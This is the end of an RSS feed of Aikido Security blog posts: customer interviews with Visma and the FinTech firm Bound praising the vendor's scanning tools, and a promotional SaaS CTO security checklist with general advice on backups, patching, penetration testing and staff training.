&lt;/ul&gt;




&lt;h4&gt;
  
  
  &lt;em&gt;Check out Injection Attacks 101 to get the an introduction to SQL injections, code injections, and XSS&lt;/em&gt;
&lt;/h4&gt;

&lt;p&gt;​&lt;/p&gt;

&lt;p&gt;&lt;iframe width="710" height="399" src="https://www.youtube.com/embed/wu6FAsiFhv0"&gt;
&lt;/iframe&gt;
&lt;/p&gt;

</description>
    </item>
    <item>
      <title>Visma’s Security Boost with Aikido: A Conversation with Nikolai Brogaard</title>
      <dc:creator>Felix Garriau</dc:creator>
      <pubDate>Wed, 06 Nov 2024 10:19:07 +0000</pubDate>
      <link>https://forem.com/aikidosecurity/vismas-security-boost-with-aikido-a-conversation-with-nikolai-brogaard-icj</link>
      <guid>https://forem.com/aikidosecurity/vismas-security-boost-with-aikido-a-conversation-with-nikolai-brogaard-icj</guid>
      <description>&lt;h3&gt;
  
  
  &lt;strong&gt;Visma’s Security Boost with Aikido: A Conversation with Nikolai Brogaard&lt;/strong&gt;
&lt;/h3&gt;

&lt;p&gt;&lt;a href="https://vimeo.com/1026556811?share=copy#t=0" rel="noopener noreferrer"&gt;https://vimeo.com/1026556811?share=copy#t=0&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;em&gt;"Aikido helps us catch the blind spots in our security that we couldn’t fully address with our existing tools. It’s been a game-changer for us beyond just the SCA (Software Composition Analysis) solutions we originally brought them in for."&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;A little while ago, we shared that &lt;a href="https://www.aikido.dev/blog/aikido-secures-visma-network" rel="noopener noreferrer"&gt;Visma chose Aikido Security for its portfolio companies&lt;/a&gt;. Recently, we had the pleasure of having &lt;a href="https://dk.linkedin.com/in/nicolaibrogaard" rel="noopener noreferrer"&gt;Nicolai Brogaard, Service Owner of SAST &amp;amp; SCA&lt;/a&gt; over in our Belgian headquarters.&lt;/p&gt;

&lt;p&gt;Nikolai’s part of the security testing team at Visma, a large conglomerate with 180 portfolio companies. Visma is serious about security—it's something they focus on across the board. With 15,000 employees (6,000 of whom are developers) and a dedicated security team of 100 people, security is at the core of their operations.&lt;/p&gt;

&lt;p&gt;These are his thoughts on the evolving security landscape, and the role Aikido plays in it.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Why Aikido?&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;At Visma, we’ve thought about building our own security tools, but we realized pretty quickly it wasn’t the best use of our resources. That’s where Aikido came in. They filled in the gaps that our existing tools, especially SAST (Static Application Security Testing), didn’t cover. With Aikido, we didn’t have to stretch ourselves thin developing tools from scratch.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Regional Expertise Matters&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Being based in the EU, it’s really important for us to work with vendors who understand the specific regulations we face—especially things like GDPR and data residency requirements. Aikido gets this. They know the ins and outs of EU regulations, which makes it much easier for us to comply with things like keeping data on national soil.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;How We Evaluate Security Software&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;When we look at new vendors, we go by the 80/20 rule: If a solution fits the needs of 80% of our portfolio companies, it’s worth considering. Aikido nailed that for us. Beyond just SCA, they provide additional features, like addressing security blind spots and helping with CSPM (Cloud Security Posture Management). These added benefits really sealed the deal for us.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;The Benefits of Aikido&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Aikido hasn’t just enhanced our security posture—it’s also helped us uncover things we were missing with our previous tools. Initially, we brought them on for SCA, but we quickly realized they could do much more, especially in reducing the time and effort spent on dealing with false positives. Their auto-remediation feature is a huge time-saver for our teams. It cuts through the noise, so our developers can focus on what really matters.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Smooth Transition&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Switching to Aikido was easy. At Visma, we have an internal security developer portal called Hubble, which makes onboarding new tools super straightforward. With Aikido, it was just a matter of integrating them into Hubble and giving our portfolio companies a gentle nudge to make the switch. Most companies transitioned quickly, and the rest follow over time as we track risk internally.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;What Visma Loves About Aikido&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;The best thing about Aikido? They’re super proactive. We have a shared Slack channel with them, and they’re always quick to respond and solve any issues our teams run into. It’s great to feel like we’re more than just a customer—they really care about making sure we’re getting the most out of their product.&lt;/p&gt;

&lt;p&gt;&lt;em&gt;"Aikido isn’t just a vendor for us—they’re a true partner. Their responsiveness and dedication to helping us succeed make all the difference."&lt;/em&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  &lt;strong&gt;Key Highlights:&lt;/strong&gt;
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Filling Security Gaps&lt;/strong&gt;: Aikido shines a light on the blind spots our other tools miss.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Time-Saving Automation&lt;/strong&gt;: The auto-remediation feature cuts down on noise, letting our developers focus on real issues.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Simple Onboarding&lt;/strong&gt;: With Visma’s internal portal, getting companies on board with Aikido is a breeze.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Proactive Support&lt;/strong&gt;: Aikido’s fast, responsive support via instant messaging platforms (like Slack) makes us feel like we’re in good hands.&lt;/li&gt;
&lt;/ul&gt;

</description>
    </item>
    <item>
      <title>Security in FinTech: Q&amp;A with Dan Kindler, co-founder &amp; CTO of Bound</title>
      <dc:creator>Felix Garriau</dc:creator>
      <pubDate>Thu, 10 Oct 2024 12:10:28 +0000</pubDate>
      <link>https://forem.com/aikidosecurity/security-in-fintech-qa-with-dan-kindler-co-founder-cto-of-bound-3o94</link>
      <guid>https://forem.com/aikidosecurity/security-in-fintech-qa-with-dan-kindler-co-founder-cto-of-bound-3o94</guid>
      <description>&lt;p&gt;Recently, we sat down with Dan Kindler, co-founder and CTO of &lt;a href="https://bound.co/" rel="noopener noreferrer"&gt;Bound&lt;/a&gt;, a FinTech company focused on minimizing currency risk and loss, to learn how they’re dealing with security.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Hey Dan! Can you tell us a bit more about yourself and Bound?&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Hi, I’m Dan Kindler and I’m the CTO and co-founder of &lt;a href="https://bound.co/" rel="noopener noreferrer"&gt;Bound&lt;/a&gt;. We focus on making currency conversion and hedging cheap, fair, and most of all, easy. Our platforms help hundreds of businesses protect themselves from currency risk across the world. Currently, about half of our team is composed of engineers.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;How is Bound positioned within the FinTech sector, and compared to the competition?&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Before diving into FinTech itself, let me cover how we’re positioned against traditional financial institutions first. Traditional banks or brokers typically cater to customers with large treasury teams who value dealing over the phone and email. Their online exchanges typically only offer on-the-spot transactions. Since our aim is to make hedging easy and hassle-free, we’re offering both spot and currency hedging tools to manage and protect your international cash flows. Back in December 2022, we received our FCA authorization, a UK financial regulatory authority, allowing us to provide regulated hedging products.&lt;/p&gt;

&lt;p&gt;When it comes to FinTech, it's safe to say we’re breaking Bound-aries (yeah) by introducing self-serve foreign exchange conversions online. Companies like Wise and Revolut have done a tremendous job of making currency conversions easy online – but they only focus on “spot” (or instant) conversions. With Bound, we focus on future cash flows, which they don’t focus as much on.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;What purpose should security in FinTech serve?&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Security plays a huge role in our industry. At the end of the day, we're dealing with financial transactions that could be worth hundreds of thousands of pounds/dollars/euros – if not more. At Bound, our transaction volume already exceeded hundreds of millions of dollars. If a security risk sneaks its way into our product - or any FinTech product for that matter - it's safe to say sh*'t hits the fan. And not just any fan. Legal consequences aside, hackers could steal other people’s savings, destroying businesses and lives.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Within FinTech, I can imagine regulatory instances or governmental regulatory bodies are putting more scrutiny on companies that deal with customer data. How does Aikido help you deal with this?&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;The pressure to stay compliant is huge. In the UK, we’re constantly navigating strict regulations like the GDPR and the FCA's guidance on data protection and security. The regulators expect us to be proactive in managing vulnerabilities, especially since we handle sensitive customer data.&lt;/p&gt;

&lt;p&gt;Aikido has been a game-changer for us. The 9-in-1 platform allows us to comprehensively cover every aspect of our software security. This approach makes it easier to meet regulatory requirements without piecing together multiple tools. A big plus has been the false-positive reduction. In a regulatory landscape, we don’t have the luxury of wasting time chasing down non-existent vulnerabilities. Aikido’s precision means that when an alert comes in, we can trust it’s something that requires action, which is invaluable during audits or compliance reviews. Plus, the clear UX allows our team to act swiftly, avoiding the complexity that usually comes with security tools. It ensures that we stay ahead of any potential compliance issues without disrupting our development flow.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;What future regulation do you see coming down the line for other engineering leads &amp;amp; VPs to keep an eye on?&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Future UK FinTech regulations are likely to focus on expanding Open Banking and enhancing digital assets oversight. With innovations like Variable Recurring Payments and a digital regulatory sandbox, engineering teams should prepare for tighter security standards and new API integrations.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Before Aikido, what kept you up at night in terms of security? How were you addressing security?&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Honestly, it was a mess trying to manage different tools for each type of security check. We were constantly worried something would get missed, and the number of false positives made it even worse. Aikido brought everything together in one place, so now we’re catching real issues without all the noise, and it’s made our lives way easier.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;We saw Bound is one of our few customers that pretty much solved every open issue reported. Has Aikido helped you out with this?&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Absolutely! We pride ourselves on taking security very seriously (as most companies – hopefully – do). For us, Aikido has had a tremendous impact on how we approach vulnerability management and remediation. We consider it to be our single source of truth, and the platform’s deduplication &amp;amp; pre-filtering of false positives features really help us see the forest through the trees. Once a real vulnerability pops up, we have a trigger appear in our issue tracker (Linear) to ensure we fix it as soon as possible. The process is pretty neat and well embedded into our development cycle, and we rely on it a lot.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;What's your experience in working together with the Aikido team?&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;The team’s been super responsive and supportive from day 1. We’re able to share real time feedback, make requests, and receive relevant product updates through our joint Slack channel. At some point, I asked the Aikido team if they realized what they’ve gotten themselves into. We didn’t let their product team sleep once we realized we could ask all the things!&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;What's your favorite feature?&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;False-positive reduction aside, the ‘Import from GitHub’-button is very cool. I really like that all the repos automatically get assigned to a team. We can keep GitHub as the source of truth, while Aikido seamlessly maps everything out accordingly.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Any closing remarks?&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;We had our first penetration test and Amazon AWS security audit earlier this year, which went very well. We got nothing above a medium (and most of the mediums I didn’t entirely agree with anyway…). They probably would have found much more of interest if we hadn’t had Aikido shouting at us constantly, so thanks for that!&lt;/p&gt;

</description>
    </item>
    <item>
      <title>Aikido’s 2024 SaaS CTO Security Checklist</title>
      <dc:creator>Felix Garriau</dc:creator>
      <pubDate>Mon, 24 Jun 2024 16:45:13 +0000</pubDate>
      <link>https://forem.com/aikidosecurity/aikidos-2024-saas-cto-security-checklist-387l</link>
      <guid>https://forem.com/aikidosecurity/aikidos-2024-saas-cto-security-checklist-387l</guid>
      <description>&lt;p&gt;SaaS companies have a huge target painted on their backs when it comes to security, and that’s something that keeps their CTOs awake at night. The Cloud Security Alliance released its &lt;a href="https://cloudsecurityalliance.org/artifacts/state-of-saas-security-2023-survey-report/" rel="noopener noreferrer"&gt;State of SaaS Security: 2023 Survey Report&lt;/a&gt; earlier this year and discovered that “55% of organizations report that they experienced an incident in the past two years”.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fd37oebn0w9ir6a.cloudfront.net%2Faccount_39169%2Fimage_b27c537ce0e805406ba416d08263148a.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fd37oebn0w9ir6a.cloudfront.net%2Faccount_39169%2Fimage_b27c537ce0e805406ba416d08263148a.png" alt="Chart showing percentage of SaaS application security incidents from the Cloud Security Alliance State of SaaS Security: 2023 Survey Report"&gt;&lt;/a&gt;&lt;em&gt;Chart from the Cloud Security Alliance State of SaaS Security: 2023 Survey Report&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;The importance of security is backed up by the results from Aikido’s recent &lt;a href="https://www.aikido.dev/blog/cloud-code-security-cto-consultation" rel="noopener noreferrer"&gt;consultation with 15 SaaS CTOs&lt;/a&gt;, in which “93% of CTOs ranked threat prevention importance 7 (out of 10) or higher.”&lt;/p&gt;

&lt;p&gt;To help SaaS CTOs sleep better, we’ve created a comprehensive SaaS CTO Security Checklist. We’re confident that, if you follow it, &lt;em&gt;and keep going back to it&lt;/em&gt;, you will make &lt;strong&gt;both your company and application 10x more secure&lt;/strong&gt;.&lt;/p&gt;

&lt;h2&gt;
  
  
  Real risks for SaaS companies
&lt;/h2&gt;

&lt;p&gt;CI/CD tools like GitHub Actions and CircleCI are prime hacker targets. Their frequent breaches &lt;a href="https://www.aikido.dev/blog/prevent-fallout-when-cicd-platform-hacked" rel="noopener noreferrer"&gt;grant access to clouds and lead to data exposure&lt;/a&gt;. A 2023 CircleCI breach compromised customer secrets, while a 2022 GitHub Actions exploit hit open source projects.&lt;/p&gt;

&lt;p&gt;A startup's entire AWS environment was &lt;a href="https://www.aikido.dev/blog/how-a-startups-cloud-got-taken-over-by-a-simple-form-that-sends-an-email" rel="noopener noreferrer"&gt;compromised via a basic contact form on their site&lt;/a&gt;. How? The form allowed SSRF attacks, granting access to IAM keys which were then emailed out. The attacker gained control of S3 buckets and environment variables.&lt;/p&gt;

&lt;p&gt;These security breaches happened to real companies and had real effects. But they could have been prevented if they had invested more time and effort into improving their security practices.&lt;/p&gt;

&lt;h2&gt;
  
  
  SaaS CTO Security Checklist: 40+ items to guide you
&lt;/h2&gt;

&lt;p&gt;Our deceptively simple checklist covers over 40 ways to harden security across your people, processes, code, infrastructure, and more. It's organized by business growth stage - &lt;strong&gt;bootstrap, startup, and scaleup&lt;/strong&gt; - so you can find the security best practices relevant to your current phase. As you grow, our checklist will become your trusted guide and constant companion on the journey to security best practices for your SaaS company.&lt;/p&gt;

&lt;p&gt;Each item on the list is designed to make you and your team think about security in the first place, then give you clear, concise instructions on what you can do to deal with the vulnerability. And each item is tagged so that you can be sure it applies to your company’s current stage.&lt;/p&gt;

&lt;p&gt;The checklist is also divided into sections so that you can consider the needs of different parts of your company. Your employees are vulnerable to different threats than your code or your infrastructure, so it makes sense to look at them separately.&lt;/p&gt;

&lt;p&gt;As you go through the list, you’ll undoubtedly find that some items don’t apply to you yet. But we recommend that you revisit the checklist regularly so that you don’t encounter any nasty surprises. Security doesn’t have to be scary, as long as you act to become more secure &lt;em&gt;before&lt;/em&gt; something bad happens.&lt;/p&gt;

&lt;p&gt;We’ve cherry-picked a few items to give you a sneak peek at the checklist. The final checklist contains over 40, so make sure you download your copy and get started on improving your security today.&lt;/p&gt;

&lt;h2&gt;
  
  
  Back up, then back up again
&lt;/h2&gt;

&lt;p&gt;The first applies to all stages of company growth, and it’s absolutely vital. But then again, we’re sure you already back up regularly, right? Right?!&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fd37oebn0w9ir6a.cloudfront.net%2Faccount_39169%2Fframe-36_97e3110e676f826d226f155ff1264ce1.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fd37oebn0w9ir6a.cloudfront.net%2Faccount_39169%2Fframe-36_97e3110e676f826d226f155ff1264ce1.png" alt="Image of SaaS CTO Security Checklist item: Back up, then back up again"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Hire an external penetration testing team
&lt;/h2&gt;

&lt;p&gt;Our next item is crucial for companies that are starting to scale up. Growth is going well, you’ve dealt with all the issues that are risks on the way up, but are you sure that your infrastructure is secure at all levels? That’s when it’s time to &lt;a href="https://get.aikido.dev/pentesting-for-saas-companies-aikido-security" rel="noopener noreferrer"&gt;hire a penetration testing team&lt;/a&gt;!&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fd37oebn0w9ir6a.cloudfront.net%2Faccount_39169%2Fframe-42-1_f3d495bceb88c574158342328e8bc759.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fd37oebn0w9ir6a.cloudfront.net%2Faccount_39169%2Fframe-42-1_f3d495bceb88c574158342328e8bc759.png" alt="Image of SaaS CTO Security Checklist item: Hire an external penetration testing team"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Update your OS and Docker containers
&lt;/h2&gt;

&lt;p&gt;This one is straightforward, but many developers cut corners here. Updating eats up sprint time while other tasks seem more urgent. But skipping updates leaves vital systems exposed to vulnerabilities. Stay diligent with patching and updating to avoid major headaches down the road.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fd37oebn0w9ir6a.cloudfront.net%2Faccount_39169%2Fframe-39_ccfe5a1da40b4460f31fe5cb57f485b8.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fd37oebn0w9ir6a.cloudfront.net%2Faccount_39169%2Fframe-39_ccfe5a1da40b4460f31fe5cb57f485b8.png" alt="Image of SaaS CTO Security Checklist item: Update your OS and Docker containers"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Get everyone accustomed to basic security practices
&lt;/h2&gt;

&lt;p&gt;The last item is relevant at all stages and it’s part and parcel of our checklist: the need to get everyone accustomed to basic security practices. Humans make mistakes. It’s inevitable. But if you get everyone thinking about security, those mistakes can be mitigated.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fd37oebn0w9ir6a.cloudfront.net%2Faccount_39169%2Fframe-36-1_f64dd7faf3758f3f21f9884ae8eb9231.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fd37oebn0w9ir6a.cloudfront.net%2Faccount_39169%2Fframe-36-1_f64dd7faf3758f3f21f9884ae8eb9231.png" alt="Image of SaaS CTO Security Checklist item: Get everyone accustomed to basic security practices"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Download your free SaaS CTO Security Checklist
&lt;/h2&gt;

&lt;p&gt;That’s just a handful of the essential tips covered in the checklist. We’ll also give you guidance on code reviews, onboarding and offboarding,  DDoS attacks, database recovery plans, and much more.&lt;/p&gt;

&lt;p&gt;Download Aikido’s 2024 SaaS CTO Security Checklist now and get started on hardening your app and getting your team thinking seriously about security. It’s never too late, or too early, no matter what stage your company is at.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Download the full SaaS Security Checklist:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://share-eu1.hsforms.com/1HXOAHoTQQxGEKFLvZx7stAfiwyg" rel="noopener noreferrer"&gt;https://share-eu1.hsforms.com/1HXOAHoTQQxGEKFLvZx7stAfiwyg&lt;/a&gt;&lt;/p&gt;

</description>
    </item>
  </channel>
</rss>
